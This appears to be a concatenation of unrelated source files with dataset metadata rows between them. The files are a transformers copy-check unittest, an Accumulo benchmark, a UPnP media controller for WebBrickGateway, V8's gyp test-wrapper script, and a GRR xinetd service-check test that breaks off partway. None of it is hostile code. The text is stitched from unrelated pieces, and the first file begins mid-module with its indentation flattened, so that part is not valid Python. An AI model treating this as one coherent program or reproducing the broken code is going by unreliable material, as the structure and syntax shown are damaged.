# This is the reference code that will be used in the tests.
# If BertLMPredictionHead is changed in modeling_bert.py, this code needs to be manually updated.
REFERENCE_CODE = """ def __init__(self, config):
super().__init__()
self.transform = BertPredictionHeadTransform(config)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
self.decoder = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
self.bias = nn.Parameter(torch.zeros(config.vocab_size))
# Need a link between the two variables so that the bias is correctly resized with `resize_token_embeddings`
self.decoder.bias = self.bias
def forward(self, hidden_states, inv_lang_adapter=None):
hidden_states = self.transform(hidden_states)
if inv_lang_adapter:
hidden_states = inv_lang_adapter(hidden_states, rev=True)
hidden_states = self.decoder(hidden_states)
return hidden_states
"""
class CopyCheckTester(unittest.TestCase):
def setUp(self):
self.transformer_dir = tempfile.mkdtemp()
os.makedirs(os.path.join(self.transformer_dir, "models/bert/"))
check_copies.TRANSFORMER_PATH = self.transformer_dir
shutil.copy(
os.path.join(git_repo_path, "src/transformers/models/bert/modeling_bert.py"),
os.path.join(self.transformer_dir, "models/bert/modeling_bert.py"),
)
def tearDown(self):
check_copies.TRANSFORMER_PATH = "src/transformers"
shutil.rmtree(self.transformer_dir)
def check_copy_consistency(self, comment, class_name, class_code, overwrite_result=None):
code = comment + f"\nclass {class_name}(nn.Module):\n" + class_code
if overwrite_result is not None:
expected = comment + f"\nclass {class_name}(nn.Module):\n" + overwrite_result
code = black.format_str(code, mode=black.FileMode([black.TargetVersion.PY35], line_length=119))
fname = os.path.join(self.transformer_dir, "new_code.py")
with open(fname, "w", newline="\n") as f:
f.write(code)
if overwrite_result is None:
self.assertTrue(len(check_copies.is_copy_consistent(fname)) == 0)
else:
            check_copies.is_copy_consistent(fname, overwrite=True)
            with open(fname, "r") as f:
                self.assertEqual(f.read(), expected)
def test_find_code_in_transformers(self):
code = check_copies.find_code_in_transformers("models.bert.modeling_bert.BertLMPredictionHead")
self.assertEqual(code, REFERENCE_CODE)
def test_is_copy_consistent(self):
# Base copy consistency
self.check_copy_consistency(
"# Copied from transformers.models.bert.modeling_bert.BertLMPredictionHead",
"BertLMPredictionHead",
REFERENCE_CODE + "\n",
)
# With no empty line at the end
self.check_copy_consistency(
"# Copied from transformers.models.bert.modeling_bert.BertLMPredictionHead",
"BertLMPredictionHead",
REFERENCE_CODE,
)
# Copy consistency with rename
self.check_copy_consistency(
"# Copied from transformers.models.bert.modeling_bert.BertLMPredictionHead with Bert->TestModel",
"TestModelLMPredictionHead",
re.sub("Bert", "TestModel", REFERENCE_CODE),
)
# Copy consistency with a really long name
long_class_name = "TestModelWithAReallyLongNameBecauseSomePeopleLikeThatForSomeReason"
self.check_copy_consistency(
f"# Copied from transformers.models.bert.modeling_bert.BertLMPredictionHead with Bert->{long_class_name}",
f"{long_class_name}LMPredictionHead",
re.sub("Bert", long_class_name, REFERENCE_CODE),
)
# Copy consistency with overwrite
self.check_copy_consistency(
"# Copied from transformers.models.bert.modeling_bert.BertLMPredictionHead with Bert->TestModel",
"TestModelLMPredictionHead",
REFERENCE_CODE,
overwrite_result=re.sub("Bert", "TestModel", REFERENCE_CODE),
)
def test_convert_to_localized_md(self):
localized_readme = check_copies.LOCALIZED_READMES["README_zh-hans.md"]
md_list = "1. **[ALBERT](https://huggingface.co/transformers/model_doc/albert.html)** (from Google Research and the Toyota Technological Institute at Chicago) released with the paper [ALBERT: A Lite BERT for Self-supervised Learning of Language Representations](https://arxiv.org/abs/1909.11942), by Zhenzhong Lan, Mingda Chen, Sebastian Goodman, Kevin Gimpel, Piyush Sharma, Radu Soricut.\n1. **[DistilBERT](https://huggingface.co/transformers/model_doc/distilbert.html)** (from HuggingFace), released together with the paper [DistilBERT, a distilled version of BERT: smaller, faster, cheaper and lighter](https://arxiv.org/abs/1910.01108) by Victor Sanh, Lysandre Debut and Thomas Wolf. The same method has been applied to compress GPT2 into [DistilGPT2](https://github.com/huggingface/transformers/tree/master/examples/distillation), RoBERTa into [DistilRoBERTa](https://github.com/huggingface/transformers/tree/master/examples/distillation), Multilingual BERT into [DistilmBERT](https://github.com/huggingface/transformers/tree/master/examples/distillation) and a German version of DistilBERT.\n1. **[ELECTRA](https://huggingface.co/transformers/model_doc/electra.html)** (from Google Research/Stanford University) released with the paper [ELECTRA: Pre-training text encoders as discriminators rather than generators](https://arxiv.org/abs/2003.10555) by Kevin Clark, Minh-Thang Luong, Quoc V. Le, Christopher D. Manning."
localized_md_list = "1. **[ALBERT](https://huggingface.co/transformers/model_doc/albert.html)** (来自 Google Research and the Toyota Technological Institute at Chicago) 伴随论文 [ALBERT: A Lite BERT for Self-supervised Learning of Language Representations](https://arxiv.org/abs/1909.11942), 由 Zhenzhong Lan, Mingda Chen, Sebastian Goodman, Kevin Gimpel, Piyush Sharma, Radu Soricut 发布。\n"
converted_md_list_sample = "1. **[ALBERT](https://huggingface.co/transformers/model_doc/albert.html)** (来自 Google Research and the Toyota Technological Institute at Chicago) 伴随论文 [ALBERT: A Lite BERT for Self-supervised Learning of Language Representations](https://arxiv.org/abs/1909.11942), 由 Zhenzhong Lan, Mingda Chen, Sebastian Goodman, Kevin Gimpel, Piyush Sharma, Radu Soricut 发布。\n1. **[DistilBERT](https://huggingface.co/transformers/model_doc/distilbert.html)** (来自 HuggingFace) 伴随论文 [DistilBERT, a distilled version of BERT: smaller, faster, cheaper and lighter](https://arxiv.org/abs/1910.01108) 由 Victor Sanh, Lysandre Debut and Thomas Wolf 发布。 The same method has been applied to compress GPT2 into [DistilGPT2](https://github.com/huggingface/transformers/tree/master/examples/distillation), RoBERTa into [DistilRoBERTa](https://github.com/huggingface/transformers/tree/master/examples/distillation), Multilingual BERT into [DistilmBERT](https://github.com/huggingface/transformers/tree/master/examples/distillation) and a German version of DistilBERT.\n1. **[ELECTRA](https://huggingface.co/transformers/model_doc/electra.html)** (来自 Google Research/Stanford University) 伴随论文 [ELECTRA: Pre-training text encoders as discriminators rather than generators](https://arxiv.org/abs/2003.10555) 由 Kevin Clark, Minh-Thang Luong, Quoc V. Le, Christopher D. Manning 发布。\n"
num_models_equal, converted_md_list = check_copies.convert_to_localized_md(
md_list, localized_md_list, localized_readme["format_model_list"]
)
self.assertFalse(num_models_equal)
self.assertEqual(converted_md_list, converted_md_list_sample)
num_models_equal, converted_md_list = check_copies.convert_to_localized_md(
md_list, converted_md_list, localized_readme["format_model_list"]
)
# Check whether the number of models is equal to README.md after conversion.
self.assertTrue(num_models_equal)
| 61.780822
| 1,434
| 0.729601
|
cfd8f61e110768742cbc25d98e9a940cb421373f
| 1,682
|
py
|
Python
|
test/system/bench/cloudstone1/cloudstone1.py
|
24601/accumulo
|
b32dd4906a83c065cdbd54df2c600a9e92f584af
|
[
"BSD-3-Clause"
] | null | null | null |
test/system/bench/cloudstone1/cloudstone1.py
|
24601/accumulo
|
b32dd4906a83c065cdbd54df2c600a9e92f584af
|
[
"BSD-3-Clause"
] | null | null | null |
test/system/bench/cloudstone1/cloudstone1.py
|
24601/accumulo
|
b32dd4906a83c065cdbd54df2c600a9e92f584af
|
[
"BSD-3-Clause"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import time
from lib import cloudshell
from lib.Benchmark import Benchmark
from lib.slaves import runAll
from lib.path import accumulo
class CloudStone1(Benchmark):
def shortDescription(self):
return 'Test the speed at which we can check that accumulo is up '\
'and we can reach all the slaves. Lower is better.'
def runTest(self):
code, out, err = cloudshell.run(self.username, self.password, 'table !METADATA\nscan\n')
self.assertEqual(code, 0, "Could not scan the !METADATA table. %s %s" % (out, err))
results = runAll('echo help | %s shell' %
accumulo('bin', 'accumulo'))
def setSpeed(self, speed):
"We want to override this method but no speed can be set"
def suite():
result = unittest.TestSuite([
CloudStone1(),
])
return result
| 37.377778
| 96
| 0.69679
|
e29a97d9f4db08f2e846450c7cba04a1d951a0a4
| 14,733
|
py
|
Python
|
WebBrickGateway/WebBrickGateway/Media.py
|
AndyThirtover/wb_gateway
|
69f9c870369085f4440033201e2fb263a463a523
|
[
"BSD-3-Clause"
] | null | null | null |
WebBrickGateway/WebBrickGateway/Media.py
|
AndyThirtover/wb_gateway
|
69f9c870369085f4440033201e2fb263a463a523
|
[
"BSD-3-Clause"
] | null | null | null |
WebBrickGateway/WebBrickGateway/Media.py
|
AndyThirtover/wb_gateway
|
69f9c870369085f4440033201e2fb263a463a523
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright L.P.Klyne 2013
# Licenced under 3 clause BSD licence
# $Id: Media.py 3138 2009-04-15 10:17:29Z philipp.schuster $
import sys, logging, string
from urlparse import urlparse, urljoin
from urllib import unquote, quote
import turbogears
import cherrypy
import ClientProfiles
from EventLib.Event import Event
from EventLib.Status import StatusVal
from EventLib.SyncDeferred import makeDeferred
from EventLib.EventHandler import EventHandler
from EventHandlers.BaseHandler import makeUri
from coherence.upnp.services.clients.caching_content_directory_client import UPNP_Container, UPNP_Item, UPNP_MediaServerList, device_name
from twisted.internet import reactor
import coherence.extern.louie as louie
_log = logging.getLogger( "WebBrickGateway.Media" )
# --------------------------------------------------
# Media interfaces
# --------------------------------------------------
class Media( object ):
"""
Local class to handle queries for media details
"""
def __init__(self):
uri,logname = makeUri(self.__class__)
super(Media,self).__init__(uri, self.doHandleEvent)
# local ids are just indexes into these arrays.
self._client_id = 0
self._clients = {} # UPNP clients
self._servers = UPNP_MediaServerList()
self.subcribeTimeout = 30
# this needs to be early so we get to see the startup of the eventhandler.
from coherence.base import Coherence
self._coherence = Coherence()
# subscribe to all events.
louie.connect(self.new_server, 'Coherence.UPnP.ControlPoint.MediaServer.detected', louie.Any)
louie.connect(self.new_renderer, 'Coherence.UPnP.ControlPoint.MediaRenderer.detected', louie.Any)
louie.connect(self.remove_server, 'Coherence.UPnP.ControlPoint.MediaServer.removed', louie.Any)
louie.connect(self.remove_renderer, 'Coherence.UPnP.ControlPoint.MediaRenderer.removed', louie.Any)
def start( self, despatch ):
pass
def stop(self, despatch):
louie.disconnect(self.new_server, 'Coherence.UPnP.ControlPoint.MediaServer.detected', louie.Any)
louie.disconnect(self.new_renderer, 'Coherence.UPnP.ControlPoint.MediaRenderer.detected', louie.Any)
louie.disconnect(self.remove_server, 'Coherence.UPnP.ControlPoint.MediaServer.removed', louie.Any)
louie.disconnect(self.remove_renderer, 'Coherence.UPnP.ControlPoint.MediaRenderer.removed', louie.Any)
def doHandleEvent( self, handler, event ):
et = event.getType()
od = event.getPayload()
return makeDeferred(StatusVal.OK)
def new_renderer(self, client, udn ):
# UPNP interface, the client is the local client to a UPNP renderer.
# again container ids are just integers.
for k in self._clients:
if self._clients[k].device.get_id() == udn:
_log.debug( "Update already exists %s", udn )
#self._clients[k] = client
return
self._client_id = self._client_id + 1
self._clients[self._client_id] = client
_log.debug( "new_renderer %u id %s", self._client_id, udn )
def remove_renderer(self, client, udn ):
_log.debug( "remove_renderer id %s", udn )
for k in self._clients:
if self._clients[k].device.get_id() == udn:
_log.debug( "removed renderer id %s", udn )
del self._clients[k]
break
def new_server(self, client, udn ):
# UPNP interface, the client is the local client to a UPNP server.
# again container ids are just integers.
_log.debug( "new_server udn %s", udn )
self._servers.add_server( client, udn )
def remove_server(self, client, udn ):
_log.debug( "remove_server id %s", udn )
self._servers.remove_server( client, udn )
def log_result(self, result):
for k in result:
itm = result[k]
if isinstance( itm, (list,tuple) ):
for itm2 in itm:
_log.debug( " item %s : %s", k, itm2 )
elif isinstance( itm, (dict) ):
_log.debug( " item %s :", k )
for key2 in itm:
itm2 = itm[key2]
_log.debug( " item %s : %s", key2, itm2 )
else:
_log.debug( "item %s : %s", k, itm )
#
# list returns a container-id and a list of entries, the list may be returned as a dictionary for a template or XML
#
def generate_list(self, result, rid, id, offset, limit):
#
# if id is none then list the server sources.
# else it a server-id:container-id.
#
# Output is an update to the result dictionary
# and the id of the container it is from.
#
_log.debug( "list id %s", id )
result["rid"] = str(rid) # in case browsing after select renderer
if rid:
rid = int(rid)
result["name"] = device_name(self._clients[rid])
else:
result["name"] = ""
srvc = None
if id:
srvc = self._servers.get_server(id)
if srvc:
ctr = srvc.get_container( id )
elif rid and self._clients.has_key(rid):
srvc = self._servers.default_server_for_renderer(device_name(self._clients[rid]))
if srvc:
id = srvc.get_top_level_container_id()
ctr = srvc.get_container( id )
result["title"] = "Browse"
if srvc:
_log.debug( "ctr %s", ctr )
if ctr:
result["title"] = ctr.title()
# result["title"] = "%s %s %s" % (ctr.artist(), ctr.album(), ctr.title())
result["items"] = list()
for ntry in srvc.enum_container(ctr, offset):
result["items"].append( ntry )
if len(result["items"]) >= limit:
break
result["id"] = id # container id
result["offset"] = offset
result["total"] = ctr.size()
result["count"] = len(result["items"])
result["limit"] = limit
result["breadcrumb"] = srvc.get_breadcrumb_trail(ctr)
else:
result["items"] = self._servers.get_servers()
def add_clients(self,result):
result["clients"] = {}
result["links"] = {}
for k in self._clients:
clnt = self._clients[k]
if clnt:
result["clients"][k] = device_name(clnt)
result["links"][k] = {}
for k2 in self._clients:
if k2 <> k and self._clients[k2]:
# This shows wheteher we should display Link/UnLink for this client pair.
result["links"][k][k2] = (True,True)
# as a dictionary and as XML
@turbogears.expose(template="WebBrickGateway.templates.mediaclient")
def client(self,rid):
rid = int(rid)
if not self._clients.has_key(rid):
return self.clients() # no longer present.
result = ClientProfiles.makeStandardResponse( cherrypy.request, "mediaclient" )
result["rid"] = rid
result["def_folder"] = "" # blank
result["sid"] = ""
srvc = self._servers.default_server_for_renderer(device_name(self._clients[rid]))
if srvc:
result["sid"] = srvc._server_id
result["def_folder"] = srvc.get_default_container_id()
result["limit"] = 50
# udn needed so client can pick up the correct event set.
result["udn"] = self._clients[rid].device.get_id()
result["name"] = device_name(self._clients[rid])
result["hasTransport"] = True # play,pause,position etc.
result["hasRenderer"] = True # volume
result["showServers"] = True # so can select tracks etc.
self.add_clients( result )
return result
# UPNP/media interface
#
@turbogears.expose(template="WebBrickGateway.templates.showqueue")
def showqueue(self, rid):
rid = int(rid)
id = None
srvc = self._servers.default_server_for_renderer(device_name(self._clients[rid]))
if srvc:
id = srvc.get_default_container_id()
result = ClientProfiles.makeStandardResponse( cherrypy.request, "showqueue" )
self.generate_list(result, rid, id, 0, sys.maxint )
self.log_result(result)
return result
#
# list returns a container-id and a list of entries, the list may be returned as a dictionary for a template or XML
#
@turbogears.expose(template="WebBrickGateway.templates.mediabrowse")
def list(self, rid, id, offset, limit):
#
# return a list of entries
# if id is none then list the server sources.
# else it a server-id:container-id.
#
# Output is a list of items
# and the id of the container it is from.
#
#TODO create breadcrumb trail
# refresh containers. May be better to get UPNP classes to handle this trail
#
_log.debug( "list id %s", id )
result = ClientProfiles.makeStandardResponse( cherrypy.request, "mediabrowse" )
self.generate_list(result, rid, id, int(offset), int(limit) )
self.log_result(result)
return result
@turbogears.expose(template="WebBrickGateway.templates.mediaclientlist")
def clients(self):
result = ClientProfiles.makeStandardResponse( cherrypy.request, "mediaclientlist" )
self.add_clients( result )
return result
def do_play(self, id, rid, queue_item):
# if id None/blank then add complete container to be played.
# locate server
# locate current renderer
# add to renderer play list.
_log.debug( "play id %s, on %s", id, rid )
if rid:
rid = int(rid)
srv = self._servers.get_server(id)
if srv:
itm = srv.get_item( id )
_log.debug( "%s play %s", srv, itm )
# get hold of the server and add to queue.
self._coherence.ctrl.play_item( srv._client, self._clients[rid], itm, queue_item )
@turbogears.expose()
def clearqueue(self, rid ):
# empty queue and return queue again
rid = int(rid)
_log.debug( "clearqueue rid %s", rid )
if self._clients.has_key(rid):
self._coherence.ctrl.clear_queue( self._clients[rid] )
return self.client(rid)
#return self.showqueue(rid)
@turbogears.expose()
def deletefromqueue(self, id, rid ):
# delete entry and return new contents.
rid = int(rid)
srv = self._servers.get_server(id)
if srv and self._clients.has_key(rid):
itm = srv.get_item( id )
if itm:
_log.debug( "deletefromqueue itm %s", itm )
reactor.callFromThread( self._clients[rid].av_transport.remove_from_queue, itm.id() )
return self.showqueue(rid)
@turbogears.expose(template="WebBrickGateway.templates.mediazonelink")
def zonelink(self, rid ):
rid = int(rid)
if not self._clients.has_key(rid):
return self.clients() # no longer present.
result = ClientProfiles.makeStandardResponse( cherrypy.request, "mediazonelink" )
result["rid"] = rid
# udn needed so client can pick up the correct event set.
result["udn"] = self._clients[rid].device.get_id()
result["name"] = device_name(self._clients[rid])
result["clients"] = {}
for k in self._clients:
clnt = self._clients[k]
if clnt and k <> rid: # exclude self.
result["clients"][k] = device_name(clnt)
# create list of zones
return result
@turbogears.expose()
def albumart(self, id, uri):
# the id of the track
#srv = self._servers.get_server(id)
#if srv:
# itm = srv.get_item( id )
# # get album art uri.
# DUMB proxy
#unescape uri
# parse
parsed = urlparse( unquote(uri) )
#r = DoHTTPRequest(wbaddr, "GET", wbUri)
@turbogears.expose()
def dozonelink(self, rid, target ):
_log.debug( "dozonelink rid %s target %s", rid, target )
if rid and target:
rid = int(rid)
target = int(target)
if self._clients.has_key(rid) and self._clients.has_key(target):
src_udn = "x-rincon:%s" % self._clients[rid].device.get_root_id()[5:]
_log.debug( "dozonelink source %s", src_udn )
reactor.callFromThread( self._clients[target].av_transport.set_av_transport_uri, 0, src_udn)
return self.zonelink(rid)
@turbogears.expose()
def dozonelinkall(self, rid):
rid = int(rid)
for k in self._clients:
if k <> rid:
self.dozonelink(rid, k )
return self.zonelink(rid)
@turbogears.expose()
def dozoneunlink(self, target ):
_log.debug( "dozoneunlink rid %s", target )
if target:
target = int(target)
if self._clients.has_key(target):
_log.debug( "dozonelink target %s", target )
reactor.callFromThread( self._clients[target].av_transport.unlink_from_group )
return self.clients()
@turbogears.expose()
def dozoneunlinkall(self, rid=None):
for k in self._clients:
if k <> rid:
self.dozoneunlink(k )
if rid:
return self.zonelink(rid)
return self.clients()
@turbogears.expose()
def play(self, id, rid=None, clearQ=None):
# if this is a single item then just play
# else clear the queue and add then play
self.do_play(id,rid,False)
return '' # success/failure?
@turbogears.expose()
def queue(self, id, rid=None, clearQ=None):
self.do_play(id,rid,True)
return '' # success/failure?
@turbogears.expose()
def playqueue(self, rid):
_log.debug( "playqueue on %s", rid )
if rid:
rid = int(rid)
srv = self._servers.default_server_for_renderer(device_name(self._clients[rid]))
cid = srv.get_default_container_id()
ctr = srv.get_container(cid)
# get hold of the server and add to queue.
self._coherence.ctrl.play_item( srv._client, self._clients[rid], ctr, False )
return self.client(rid)
@turbogears.expose()
def index(self,*args):
return self.clients( '' )
# $Id: Media.py 3138 2009-04-15 10:17:29Z philipp.schuster $
| 35.673123
| 137
| 0.594923
|
d99d055e5010e28bd0adae4347e9ea5800041f33
| 10,544
|
py
|
Python
|
deps/v8/tools/test-wrapper-gypbuild.py
|
racker/node
|
7338d9b66ee8b15aeb38d0bb3f03861f2458b10b
|
[
"BSD-2-Clause"
] | 5
|
2015-05-03T23:44:46.000Z
|
2020-01-04T22:20:56.000Z
|
deps/v8/tools/test-wrapper-gypbuild.py
|
trojanspike/node
|
2d0011f53256e7a1a707a6672772d36260f81691
|
[
"BSD-2-Clause"
] | null | null | null |
deps/v8/tools/test-wrapper-gypbuild.py
|
trojanspike/node
|
2d0011f53256e7a1a707a6672772d36260f81691
|
[
"BSD-2-Clause"
] | 1
|
2020-04-14T16:40:28.000Z
|
2020-04-14T16:40:28.000Z
|
#!/usr/bin/env python
#
# Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# This is a convenience script to run the existing tools/test.py script
# when using the gyp/make based build.
# It is intended as a stop-gap rather than a long-term solution.
import optparse
import os
from os.path import join, dirname, abspath
import subprocess
import sys
PROGRESS_INDICATORS = ['verbose', 'dots', 'color', 'mono']
def BuildOptions():
result = optparse.OptionParser()
# Flags specific to this wrapper script:
result.add_option("--arch-and-mode",
help='Architecture and mode in the format "arch.mode"',
default=None)
result.add_option("--outdir",
help='Base output directory',
default='out')
result.add_option("--no-presubmit",
help='Skip presubmit checks',
default=False, action="store_true")
result.add_option("--buildbot",
help='Adapt to path structure used on buildbots',
default=False, action="store_true")
# Flags this wrapper script handles itself:
result.add_option("-m", "--mode",
help="The test modes in which to run (comma-separated)",
default='release,debug')
result.add_option("--arch",
help='The architectures to run tests for (comma-separated)',
default='ia32,x64,arm')
# Flags that are passed on to the wrapped test.py script:
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option("-p", "--progress",
help="The style of progress indicator (verbose, dots, color, mono)",
choices=PROGRESS_INDICATORS, default="mono")
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("--download-data", help="Download missing test suite data",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=60, type="int")
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--special-command", default=None)
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--isolates", help="Whether to test isolates", default=False, action="store_true")
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
result.add_option("--stress-only",
help="Only run tests with --always-opt --stress-opt",
default=False, action="store_true")
result.add_option("--nostress",
help="Don't run crankshaft --always-opt --stress-op test",
default=False, action="store_true")
result.add_option("--shard-count",
help="Split testsuites into this number of shards",
default=1, type="int")
result.add_option("--shard-run",
help="Run this shard from the split up tests.",
default=1, type="int")
result.add_option("--noprof", help="Disable profiling support",
default=False)
# Flags present in the original test.py that are unsupported in this wrapper:
# -S [-> scons_flags] (we build with gyp/make, not scons)
# --no-build (always true)
# --build-only (always false)
# --build-system (always 'gyp')
# --simulator (always true if arch==arm, always false otherwise)
# --shell (automatically chosen depending on arch and mode)
return result
def ProcessOptions(options):
if options.arch_and_mode == ".":
options.arch = []
options.mode = []
else:
if options.arch_and_mode != None and options.arch_and_mode != "":
tokens = options.arch_and_mode.split(".")
options.arch = tokens[0]
options.mode = tokens[1]
options.mode = options.mode.split(',')
options.arch = options.arch.split(',')
for mode in options.mode:
if not mode.lower() in ['debug', 'release']:
print "Unknown mode %s" % mode
return False
for arch in options.arch:
if not arch in ['ia32', 'x64', 'arm', 'mips']:
print "Unknown architecture %s" % arch
return False
if options.buildbot:
# Buildbots run presubmit tests as a separate step.
options.no_presubmit = True
return True
def PassOnOptions(options):
result = []
if options.verbose:
result += ['--verbose']
if options.progress != 'mono':
result += ['--progress=' + options.progress]
if options.report:
result += ['--report']
if options.download_data:
result += ['--download-data']
if options.suite != []:
for suite in options.suite:
result += ['--suite=../../test/' + suite]
if options.timeout != 60:
result += ['--timeout=%s' % options.timeout]
if options.snapshot:
result += ['--snapshot']
if options.special_command:
result += ['--special-command="%s"' % options.special_command]
if options.valgrind:
result += ['--valgrind']
if options.cat:
result += ['--cat']
if options.warn_unused:
result += ['--warn-unused']
if options.j != 1:
result += ['-j%s' % options.j]
if options.time:
result += ['--time']
if not options.suppress_dialogs:
result += ['--no-suppress-dialogs']
if options.isolates:
result += ['--isolates']
if not options.store_unexpected_output:
result += ['--no-store-unexpected_output']
if options.stress_only:
result += ['--stress-only']
if options.nostress:
result += ['--nostress']
if options.shard_count != 1:
result += ['--shard-count=%s' % options.shard_count]
if options.shard_run != 1:
result += ['--shard-run=%s' % options.shard_run]
if options.noprof:
result += ['--noprof']
return result
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
workspace = abspath(join(dirname(sys.argv[0]), '..'))
returncodes = 0
if not options.no_presubmit:
print ">>> running presubmit tests"
returncodes += subprocess.call([workspace + '/tools/presubmit.py'])
args_for_children = ['python']
args_for_children += [workspace + '/tools/test.py'] + PassOnOptions(options)
args_for_children += ['--no-build', '--build-system=gyp']
for arg in args:
args_for_children += [arg]
env = os.environ
for mode in options.mode:
for arch in options.arch:
print ">>> running tests for %s.%s" % (arch, mode)
if options.buildbot:
shellpath = workspace + '/' + options.outdir + '/' + mode
mode = mode.lower()
else:
shellpath = workspace + '/' + options.outdir + '/' + arch + '.' + mode
env['LD_LIBRARY_PATH'] = shellpath + '/lib.target'
shell = shellpath + "/d8"
cmdline = ' '.join(args_for_children +
['--arch=' + arch] +
['--mode=' + mode] +
['--shell=' + shell])
child = subprocess.Popen(cmdline,
shell=True,
cwd=workspace,
env=env)
returncodes += child.wait()
if len(options.mode) == 0 and len(options.arch) == 0:
print ">>> running tests"
shellpath = workspace + '/' + options.outdir
env['LD_LIBRARY_PATH'] = shellpath + '/lib.target'
shell = shellpath + '/d8'
child = subprocess.Popen(' '.join(args_for_children +
['--shell=' + shell]),
shell=True,
cwd=workspace,
env=env)
returncodes = child.wait()
return returncodes
if __name__ == '__main__':
sys.exit(Main())
| 39.639098
| 102
| 0.638657
|
aff7ad795d84b58d719703f2d3322affb0aab5f8
| 9,522
|
py
|
Python
|
grr/checks/services_test.py
|
theGreenJedi/grr
|
d9e11e304dc299d49c76b7fdf6fdbfcd4b8eec39
|
[
"Apache-2.0"
] | null | null | null |
grr/checks/services_test.py
|
theGreenJedi/grr
|
d9e11e304dc299d49c76b7fdf6fdbfcd4b8eec39
|
[
"Apache-2.0"
] | null | null | null |
grr/checks/services_test.py
|
theGreenJedi/grr
|
d9e11e304dc299d49c76b7fdf6fdbfcd4b8eec39
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for service state checks."""
from grr.lib import flags
from grr.lib import test_lib
from grr.lib.checks import checks_test_lib
from grr.lib.rdfvalues import client as rdf_client
from grr.parsers import linux_service_parser
from grr.parsers import linux_service_parser_test
class XinetdServiceStateTests(checks_test_lib.HostCheckTest):
@classmethod
def setUpClass(cls):
cls.LoadCheck("services.yaml")
cls.parser = linux_service_parser.LinuxXinetdParser().ParseMultiple
def RunXinetdCheck(self,
chk_id,
svc,
disabled,
sym,
found,
xinetd=False,
should_detect=True):
host_data = self.SetKnowledgeBase()
cfgs = linux_service_parser_test.GenXinetd(svc, disabled)
stats, files = linux_service_parser_test.GenTestData(cfgs, cfgs.values())
data = list(self.parser(stats, files, None))
# create entries recording whether xinetd itself is set up to start or not
if xinetd:
cfgs = linux_service_parser_test.GenInit(
"xinetd", "the extended Internet services daemon")
stats, files = linux_service_parser_test.GenTestData(cfgs, cfgs.values())
lsb_parser = linux_service_parser.LinuxLSBInitParser()
data.extend(list(lsb_parser.ParseMultiple(stats, files, None)))
host_data["LinuxServices"] = self.SetArtifactData(parsed=data)
results = self.RunChecks(host_data)
if should_detect:
self.assertCheckDetectedAnom(chk_id, results, sym, found)
else:
self.assertCheckUndetected(chk_id, results)
def testEmptyXinetdCheck(self):
chk_id = "CIS-INETD-WITH-NO-SERVICES"
sym = "Missing attribute: xinetd running with no xinetd-managed services."
found = ["Expected state was not found"]
# xinetd is running and the only service is disabled - there should be a hit
self.RunXinetdCheck(chk_id,
"finger",
"yes",
sym,
found,
xinetd=True,
should_detect=True)
# xinetd is running and there is a service enabled - no hit
self.RunXinetdCheck(chk_id,
"finger",
"no",
sym,
found,
xinetd=True,
should_detect=False)
# xinetd not running and the only service is disabled - no hit
self.RunXinetdCheck(chk_id,
"finger",
"yes",
sym,
found,
xinetd=False,
